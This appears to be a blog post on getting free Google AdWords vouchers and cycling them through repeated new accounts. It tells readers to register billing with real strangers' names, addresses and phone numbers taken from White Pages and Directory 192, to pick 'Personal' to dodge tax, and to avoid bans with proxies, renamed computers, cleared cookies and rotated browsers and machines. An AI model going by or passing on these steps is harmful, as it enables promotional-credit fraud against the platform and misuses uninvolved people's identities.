
Where to get Free AdWords vouchers

  1. From Google – look out for display adverts after reading this post (or here, here, here & here or search this)!
  2. From Domain Sellers – Authorised resellers can issue Adwords with a domain sale
  3. From Newspapers & Magazines – Subscribe to free marketing magazines
  4. Google Engage – Register with Google as an agency to gain 50 free vouchers
  5. Search eBay for “AdWords vouchers” – prices range from $3-$7 (so not strictly free in this case)

 

Step One – Set up Google Account

With a code – they look something like 5ZBC-4C4S-NZDB-2DQ9-WTYJ – the first step is to set up a Google account.

Best would be using a new, unique, non-Gmail account. The aim is to be a virgin account in all senses. Any old, established Gmail accounts should not be used.

Step Two – Join AdWords

AdWords is a separate service to your Google Account, so you need to join.

Once joined, the first thing you will see is that Google AdWords prompts to set up a Campaign. Create your campaign one time.

You can choose from the drop down to set up a “Search only”. Google AdWords offers quite a few types of campaign – mobile, search, search and search partners, content network and so on.

  • Limit your campaign geographical reach to your territory or city. By default campaigns are set to countrywide.
  • Perhaps set what times you want the campaign to run 9-5, 24 hours or such like.
  • At the bottom of the page, choose “Set up Billing”

 

 Step Three – Payment Information

  1. Select Your Country
  2. Check “Personal” as opposed to “Business” to avoid incurring tax
  3. Enter a real address, zip code and telephone number – you can find plenty of names, address and phone numbers in White Pages and Directory 192 services.

Step Four – Select Manual & Enter Voucher

The way to avoid activation fees, and get your free “lunch” is to select ‘manual’ (See image below)

By doing this there is the option to enter a voucher code. This is one of the most important steps. Should you select any other payment schedule the free lunch will disappear…you cannot change your schedule of payment once the account is live.

 

Once you enter the code….It’s not only Google employees who get free food – you can too.

 

Used AdWords before?

Previously run Google AdWords? Install AdWords Editor, go to FileFile > Export Spreadsheet (CSV) > Export Whole Account.

Log out of the old account, and add your new account freshly set up account details. From here select File > Import CSV > From File – select the previously exported CSV, import and upload. With this the AdWords account is now ready to go.

Confused? Watch this video.

 

What not to do

Never run two AdWords accounts simultaneously.  For one site, run one account. Never duplicate. Pause account one, before submitting account two (with free voucher) for verification from Google. If you overlap the two, expect a slap.

Never do this on a valued site – take a copy of your money site (if need be using www.httrack.com), robots.txt out the domain from natural search, host it somewhere free e.g. 00.webhost.com, www.zymic.com or Google Sites. Your aim is to get free traffic. If you cannot copy the site, perhaps consider hosting an interstitial, landing page or exact match domain microsite.

Never use a catchall email to set up Google accounts. By this, don’t use a catchall to set up account1@tld.com, account2@tld.com, etc – you must have unique accounts. Hotmail or Yahoo will do. Be authentic with the account names joebloggs@hotmail.com etc.

Never over do it. By this it is meant; don’t try to use a few vouchers per day…or even one per day, limit yourself to one every other day. This method is for accounts which might incur £10-15 PPC costs per day. You might think of this method as a way to augment current traffic levels.   Yes – Free traffic.

AdWords Account Banned

There are lots of reasons why your AdWords account might get pulled. To avoid banning your account or your IP here are a few measures to avoid detection:

  1. Use proxy servers.
  2. Regularly change your Computer Name
  3. Clear utm cookies between each session, and between each login between PPC accounts you manage.
  4. Create and administer your “free lunch PPC” account rotating using say IE9 rather than your usual Chrome/FF browser
  5. Administer your “free lunch PPC” on more than one computer

This method is a great way to get free adwords vouchers to work for you. Of course, this method is clearly not for everyone. Like every marketing / SEO trick/tool, use wisely and at your own risk.

Need help? Post your comments and I’ll answer inline.  Do you have another angle to gaining free AdWords (or Facebook or Bing ads?) – let us know. It’s good to share!